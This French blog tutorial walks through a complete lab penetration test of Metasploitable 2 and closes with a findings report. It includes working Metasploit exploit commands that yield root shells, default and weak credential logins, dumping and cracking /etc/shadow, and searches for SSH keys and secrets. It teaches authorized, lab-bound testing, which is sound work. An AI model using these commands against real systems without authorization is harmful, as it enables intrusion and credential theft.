Menu
À propos Services Parcours Travaillons ensemble
Security operations center
Sécurité Mar 8, 2026 • 30 min de lecture

The Full Audit: A Complete Penetration Test from Start to Finish

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

Partager:
Lee Foropoulos

Lee Foropoulos

30 min de lecture

Le Chemin du Hacker : Série en 5 Parties

Partie 1 : IntroductionPartie 2 : Maîtrise du FlipperPartie 3 : Fondamentaux de KaliPartie 4 : ExploitationPartie 5 : L'Audit Complet

Vous avez commencé cette série en vous demandant ce que font réellement les hackers. Vous avez appris que ce n'est pas une question de capuches et de texte vert. C'est de la résolution méthodique de problèmes. Vous avez cloné des badges, cartographié des réseaux, capturé des handshakes et obtenu des shells sur des machines vulnérables.

Maintenant, nous assemblons le tout. Cet article vous guide à travers un test de pénétration complet contre une cible fictive. Chaque phase, chaque décision, chaque découverte, documentée exactement comme le ferait un professionnel.

Le Scénario

Client : Initech Labs (une petite entreprise tech fictive)

Périmètre : Test de pénétration du réseau interne

Objectif : Identifier les vulnérabilités et démontrer l'impact potentiel sur l'entreprise

Votre cible : Votre propre réseau de laboratoire (Kali + Metasploitable 2 + toute autre VM configurée)

Préparez-vous un café. Ça va être amusant.

Phase 1 : Pré-Engagement

Avant de toucher un clavier, les pentesters professionnels gèrent le côté administratif. Si vous sautez cette étape, vous n'êtes pas un pentester. Vous êtes juste quelqu'un qui commet des délits.

L'Appel de Cadrage

Dans un engagement réel, vous auriez un appel avec le client pour comprendre :

  • Qu'est-ce qui est dans le périmètre ? Quels réseaux, plages IP, applications ?
  • Qu'est-ce qui est hors périmètre ? Systèmes de production ? Services tiers ?
  • Fenêtre de test ? Quand pouvez-vous tester ? Heures ouvrables uniquement ?
  • Points de contact ? Qui appelez-vous si quelque chose casse ?
  • Objectifs ? Conformité réglementaire ou amélioration réelle de la sécurité ?

Pour Votre Laboratoire

Périmètre : Votre réseau de laboratoire isolé uniquement. Hors périmètre : Tout le reste sur terre. Fenêtre de test : Quand vous voulez. Objectif : Apprendre en pratiquant.

Règles d'Engagement

Les engagements réels ont des règles écrites. Voici ce qu'elles couvrent typiquement :

  • Lettre d'autorisation - Document signé prouvant que vous avez la permission
  • Procédures d'escalade - Que faire si vous trouvez quelque chose de critique
  • Gestion des données - Comment gérer les données sensibles rencontrées
  • Exigences de nettoyage - Supprimer tous les outils et portes dérobées à la fin
  • Délai du rapport - Quand le rapport final est-il dû ?

Obtenez Toujours une Autorisation Écrite

Même pour des tests "amicaux" sur le réseau d'un ami. Un email signé disant "vous avez la permission de tester mon réseau du DATE au DATE" pourrait faire la différence entre une expérience d'apprentissage et une condamnation pénale. Prenez cela au sérieux.

Phase 2 : Reconnaissance

Il est temps d'apprendre tout sur la cible. Dans un engagement réel, cela inclurait l'OSINT (renseignement en sources ouvertes) : recherches Google, profils LinkedIn, sites web de l'entreprise, enregistrements DNS. Pour notre laboratoire, nous passons directement à la reconnaissance active.

Étape 1 : Découverte du Réseau

Première question : qu'y a-t-il sur ce réseau ?

bash# Trouvez votre plage réseau
ip a | grep inet
# Cherchez quelque chose comme : inet 192.168.56.100/24

# Découvrez tous les hôtes actifs
sudo nmap -sn 192.168.56.0/24 -oA discovery

# Résultats (exemple) :
Nmap scan report for 192.168.56.1
Host is up (0.00032s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00089s latency).
Nmap scan report for 192.168.56.102
Host is up (0.00045s latency).

Documentez tout. Créez une note comme celle-ci :

text# Initech Labs - Découverte Réseau
# Date : 2026-03-08
# Testeur : Votre Nom

192.168.56.1   - Passerelle/Routeur
192.168.56.101 - Inconnu (à investiguer)
192.168.56.102 - Inconnu (à investiguer)

Étape 2 : Scan de Ports

Maintenant nous creusons plus profond. Quels services tournent ?

bash# Scan complet de ports avec détection de services
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101

# Cela prend du temps. Pour des résultats plus rapides pendant l'apprentissage :
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

Sur Metasploitable 2, vous verrez un trésor :

textPORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
80/tcp   open  http        Apache httpd 2.2.8
139/tcp  open  netbios-ssn Samba smbd 3.X
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
5432/tcp open  postgresql  PostgreSQL DB
...

Quelle exposition. Mettons à jour nos notes :

text192.168.56.101 - Serveur Linux (Metasploitable)
  - FTP (21): vsftpd 2.3.4       # Porte dérobée connue !
  - SSH (22): OpenSSH 4.7p1      # Ancien
  - Telnet (23): Actif            # Pourquoi ça existe encore en 2026 ?
  - HTTP (80): Apache 2.2.8      # Apps web à tester
  - SMB (139/445): Samba 3.X     # Mine d'or potentielle
  - MySQL (3306): 5.0.51a        # Accès base de données ?
  - PostgreSQL (5432): Actif     # Autre BDD

Étape 3 : Identification des Vulnérabilités

Voyons ce qui est réellement exploitable.

bash# Exécuter les scripts de vulnérabilités
sudo nmap --script vuln -oA vuln_scan 192.168.56.101

# Vérifier des services spécifiques dans Metasploit
msfconsole
msf6 > search vsftpd
msf6 > search samba 3
msf6 > search apache 2.2

La porte dérobée vsftpd 2.3.4 saute immédiatement aux yeux. C'est un shell garanti. Mais un bon pentester ne s'arrête pas à la première découverte. Vous documentez tout.

Salle de serveurs avec des équipements réseau clignotants
Une reconnaissance approfondie cartographie toute la surface d'attaque avant de lancer un seul exploit. Chaque port ouvert et version de service devient un point de données dans votre évaluation.

Phase 3 : Exploitation

C'est là que ça devient passionnant. Nous avons plusieurs points d'entrée potentiels. Travaillons-les systématiquement.

Vecteur d'Attaque 1 : Porte Dérobée FTP

bashmsf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned
[+] Command shell session 1 opened

whoami
root

id
uid=0(root) gid=0(root)

Découverte documentée : Shell root obtenu via la porte dérobée FTP. Temps entre le premier scan et la compromission totale : environ 10 minutes.

Shell root obtenu via la porte dérobée FTP. Temps entre le premier scan et la compromission totale : environ 10 minutes.

Mais nous ne nous arrêtons pas là. Quoi d'autre est accessible ?

Vecteur d'Attaque 2 : Samba

bash# Mettre la session en arrière-plan
background

msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > exploit

[*] Command shell session 2 opened

whoami
root

Un autre shell root via un vecteur différent. Deux chemins indépendants vers la compromission totale.

Vecteur d'Attaque 3 : Applications Web

Voyons ce qui tourne sur le port 80.

bash# Énumérer les répertoires web
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt

# Résultats :
/cgi-bin/     (Status: 403)
/dav/         (Status: 301)
/icons/       (Status: 301)
/index        (Status: 200)
/phpMyAdmin/  (Status: 301)
/phpinfo      (Status: 200)
/test/        (Status: 301)
/twiki/       (Status: 301)

# Exécuter nikto pour plus de découvertes
nikto -h http://192.168.56.101

phpMyAdmin avec des identifiants par défaut ? Vérifions :

text# Essayer les identifiants courants
Username: root
Password: (vide)

# Accès accordé !

Accès administrateur à la base de données sans mot de passe. De là, nous pourrions extraire toutes les données, modifier les enregistrements ou utiliser les opérations fichiers de MySQL pour écrire un web shell.

Vecteur d'Attaque 4 : Identifiants SSH Faibles

bashmsf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.56.101
msf6 auxiliary(...) > set USERNAME msfadmin
msf6 auxiliary(...) > set PASSWORD msfadmin
msf6 auxiliary(...) > run

[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Des identifiants faibles donnent un accès SSH. Pas root, mais nous gérerons cela en post-exploitation.

Phase 4 : Post-Exploitation

Nous avons l'accès. Et maintenant ? Un vrai test de pénétration démontre l'impact business. Que peut réellement faire un attaquant avec cet accès ?

Récolte d'Identifiants

bash# Depuis notre shell root
cat /etc/shadow
root:$1$xyz...truncated...:14889:0:99999:7:::
msfadmin:$1$abc...truncated...:14889:0:99999:7:::
user:$1$def...truncated...:14889:0:99999:7:::
postgres:$1$ghi...truncated...:14889:0:99999:7:::

# Sauvegarder pour le cracking hors ligne
cat /etc/passwd > /tmp/passwd.txt
cat /etc/shadow > /tmp/shadow.txt

# Sur Kali, les craquer
unshadow passwd.txt shadow.txt > combined.txt
john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

Reconnaissance Réseau (Depuis l'Intérieur)

bash# Quels autres réseaux cette machine peut-elle atteindre ?
ifconfig
route -n
cat /etc/hosts
arp -a

# Qu'est-ce qui se connecte à cette machine ?
netstat -tulpn
ss -tulpn

# Chercher des clés SSH (pour le mouvement latéral)
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null

Découverte de Données Sensibles

bash# Chercher des fichiers intéressants
find / -name "*.conf" 2>/dev/null | head -20
find / -name "*.sql" 2>/dev/null
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null

# Vérifier les emplacements de configuration courants
cat /var/www/*/config.php 2>/dev/null
cat /etc/mysql/my.cnf

# Énumération de la base de données
mysql -u root -p  # Essayer mot de passe vide
mysql> SHOW DATABASES;
mysql> SELECT * FROM mysql.user;

Élévation de Privilèges (depuis msfadmin)

Rappelez-vous cette connexion SSH en tant que msfadmin ? Passons root en utilisant ce que nous avons appris dans la Partie 4.

bash# SSH en tant que msfadmin
ssh [email protected]

# Vérifier les permissions sudo
sudo -l
# (La sortie varie, vérifions d'autres vecteurs)

# Trouver les binaires SUID
find / -perm -4000 2>/dev/null

# Chercher des scripts modifiables exécutés par root
cat /etc/crontab

# Télécharger et exécuter LinPEAS pour une vérification complète
# (Dans un scénario réel, déjà couvert dans la Partie 4)
Professionnel travaillant à un bureau avec des outils de cybersécurité
La post-exploitation démontre l'impact réel sur l'entreprise. La différence entre un scan de vulnérabilités et un test de pénétration est de prouver ce qu'un attaquant peut réellement faire avec l'accès.

Phase 5 : Documentation et Découvertes

Le test est inutile sans rapport. C'est ce qui sépare les professionnels des script kiddies. Vous devez expliquer ce que vous avez trouvé, pourquoi c'est important et comment le corriger.

Résumé des Découvertes

Voici ce que nous avons trouvé sur le réseau d'"Initech Labs", formaté comme dans un vrai rapport :

CRITIQUE : Porte Dérobée du Service FTP (CVE-2011-2523)

Système Affecté : 192.168.56.101

Risque : Exécution de code à distance non authentifiée en tant que root

Preuve : Shell root complet obtenu en moins de 60 secondes

Recommandation : Mettre à jour immédiatement vsftpd vers la version actuelle ou désactiver entièrement le service FTP.

CRITIQUE : Exécution de Code à Distance via Samba

Système Affecté : 192.168.56.101

Risque : Exécution de code à distance non authentifiée en tant que root

Preuve : Shell root complet obtenu via l'exploit usermap_script

Recommandation : Mettre à jour Samba vers la version actuelle. Restreindre l'accès SMB aux systèmes nécessaires uniquement.

ÉLEVÉ : Accès Root MySQL Sans Mot de Passe

Système Affecté : 192.168.56.101

Risque : Compromission complète de la base de données, vol de données, déploiement de web shell

Preuve : Connexion en tant que root avec mot de passe vide via phpMyAdmin

Recommandation : Définir un mot de passe root fort. Restreindre l'accès à phpMyAdmin. Envisager de supprimer phpMyAdmin complètement.

ÉLEVÉ : Identifiants SSH Faibles

Système Affecté : 192.168.56.101

Risque : Accès authentifié menant à une élévation de privilèges

Preuve : msfadmin:msfadmin authentifié avec succès

Recommandation : Imposer une politique de mots de passe forts. Implémenter l'authentification SSH par clé. Considérer fail2ban.

MOYEN : Service Telnet Activé

Système Affecté : 192.168.56.101

Risque : Identifiants transmis en clair

Preuve : Port 23 ouvert et acceptant les connexions

Recommandation : Désactiver Telnet. Utiliser SSH pour toute administration à distance.

BAS : Page phpinfo() Exposée

Système Affecté : 192.168.56.101

Risque : La divulgation d'information facilite les attaques ultérieures

Preuve : http://192.168.56.101/phpinfo accessible sans authentification

Recommandation : Supprimer ou restreindre l'accès aux pages phpinfo.

Résumé Exécutif

C'est ce que les dirigeants lisent réellement. Gardez-le court, percutant et sans jargon :

Résumé Exécutif

Pendant le test de pénétration du réseau interne d'Initech Labs, l'équipe de sécurité a obtenu le contrôle administratif complet du serveur principal en 10 minutes après le début de l'évaluation.

Découvertes Clés :

10 min
Temps entre le premier scan et la compromission root complète sur un serveur avec des services non corrigés.
  • 2 vulnérabilités critiques permettant une prise de contrôle à distance immédiate
  • 2 problèmes de haute sévérité exposant bases de données et identifiants utilisateur
  • Plusieurs découvertes moyennes et basses indiquant des lacunes de sécurité systémiques

Conclusion : Un attaquant avec des compétences basiques pourrait compromettre entièrement ce système en minutes. Une remédiation immédiate est requise pour toutes les découvertes critiques et élevées. Une évaluation de suivi est recommandée après application des correctifs.

Phase 6 : Nettoyage et Clôture

Un pentester professionnel laisse l'environnement exactement comme il l'a trouvé.

bash# Documenter toutes les sessions
msf6 > sessions -l

# Fermer toutes les sessions
msf6 > sessions -K

# Sur la cible (si vous avez créé des fichiers) :
rm /tmp/linpeas.sh
rm /tmp/*.txt

# Supprimer les utilisateurs créés
userdel testuser

# Supprimer les clés SSH ajoutées
rm /home/*/.ssh/authorized_keys

# Documenter tout ce que vous avez supprimé

Dans un engagement réel, vous devriez aussi :

  • Supprimer tous les outils téléchargés pendant les tests
  • Documenter tout changement apporté à l'environnement
  • Fournir les hashes/checksums des données extraites
  • Supprimer de manière sécurisée toutes les données client après livraison du rapport

La Liste de Vérification Méthodologique Complète

Voici votre workflow réutilisable pour tout test de pénétration :

Méthodologie de Test de Pénétration

  1. Pré-Engagement
    • Définir le périmètre et les règles d'engagement
    • Obtenir l'autorisation écrite
    • Établir les canaux de communication
    • Configurer votre environnement de test
  2. Reconnaissance
    • Découverte réseau (énumération des hôtes)
    • Scan de ports et identification des services
    • Scan de vulnérabilités
    • Énumération des applications web
    • Tout documenter
  3. Exploitation
    • Valider les vulnérabilités (ne faites pas aveuglément confiance aux scanners)
    • Exploiter les vulnérabilités confirmées
    • Documenter chaque compromission réussie
    • Capturer les preuves (captures d'écran, logs)
  4. Post-Exploitation
    • Énumérer le système compromis
    • Récolter les identifiants
    • Identifier les données sensibles
    • Tenter l'élévation de privilèges
    • Chercher des opportunités de mouvement latéral
  5. Rapport
    • Rédiger le résumé exécutif (impact business)
    • Documenter toutes les découvertes avec preuves
    • Fournir des recommandations de remédiation
    • Inclure les détails techniques pour les équipes IT
  6. Nettoyage
    • Supprimer tous les outils et artefacts
    • Fermer toutes les sessions et portes dérobées
    • Documenter tout changement d'environnement
    • Gérer de manière sécurisée les données client
Plan d'Action d'Audit Complet 0/6

La Suite : Votre Chemin

Vous avez terminé Le Chemin du Hacker. Vous êtes passé de "qu'est-ce que le hacking ?" à la réalisation d'un test de pénétration complet. C'est réellement impressionnant.

Mais ce n'est que le début. Voici où aller ensuite :

Plateformes de Pratique

  • Hack The Box - Machines réalistes pour s'entraîner. Commencez par les boxes retirées "Faciles".
  • TryHackMe - Parcours d'apprentissage guidés. Excellent pour une progression structurée.
  • VulnHub - VMs vulnérables gratuites à télécharger et pratiquer localement.
  • PentesterLab - Axé sur la sécurité des applications web.

Certifications (Si Vous le Souhaitez)

  • eJPT (eLearnSecurity Junior Penetration Tester) - Excellent point de départ, examen pratique
  • OSCP (Offensive Security Certified Professional) - Le standard de l'industrie, brutal mais respecté
  • PNPT (Practical Network Penetration Tester) - Moderne, pratique, inclut la rédaction de rapport
  • CEH (Certified Ethical Hacker) - Pour les exigences corporate, moins pratique

Spécialisations

  • Sécurité des Applications Web - OWASP, Burp Suite, injection SQL, XSS
  • Active Directory - La plupart des environnements d'entreprise l'utilisent
  • Sécurité Cloud - Pentest AWS, Azure, GCP
  • Sécurité Mobile - Tests d'applications Android/iOS
  • Red Teaming - Simulation complète d'adversaire, physique + numérique
  • Rétro-Ingénierie - Analyse de malware, développement d'exploits

Construisez Votre Laboratoire Maison

Les meilleurs pentesters ont des laboratoires élaborés. Commencez simple et développez :

  • Ajoutez Windows Server avec Active Directory
  • Configurez un contrôleur de domaine
  • Déployez des applications web vulnérables (DVWA, bWAPP, WebGoat)
  • Construisez un réseau avec plusieurs segments
  • Ajoutez HoneyAegis pour voir les attaques du point de vue du défenseur

Le Chemin du Hacker : Terminé

Vous y êtes arrivé. Les cinq parties, de curieux à compétent.

Partie 1 : Introduction Partie 2 : Maîtrise du Flipper Partie 3 : Fondamentaux de Kali Partie 4 : Exploitation Partie 5 : L'Audit Complet

Série Terminée - Votre Parcours

Partie 1 : Vous avez appris ce qu'est réellement le hacking et obtenu vos premières victoires avec le Flipper Zero

Partie 2 : Vous avez maîtrisé chaque protocole du Flipper : Sub-GHz, RFID, NFC, BadUSB, GPIO

Partie 3 : Vous avez construit votre laboratoire Kali, appris nmap et capturé des handshakes WiFi

Partie 4 : Vous avez maîtrisé Metasploit, l'exploitation, l'élévation de privilèges et le pivoting

Partie 5 : Vous avez tout assemblé en une méthodologie complète de test de pénétration

La sécurité n'est pas une destination. C'est une pratique. Les outils changeront, les vulnérabilités évolueront, mais la méthodologie reste la même. Questionnez tout. Documentez tout. N'arrêtez jamais d'apprendre.

Bienvenue de l'autre côté.

  • Lee
How was this article?

Partager

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Ne manquez aucun article

Recevez une notification lors de la publication de nouveaux articles. Aucun courriel requis.

Vous verrez une banniere sur le site quand il y a un nouvel article, plus une notification navigateur si vous autorisez.

Notifications du navigateur uniquement. Pas de spam, pas de courriel.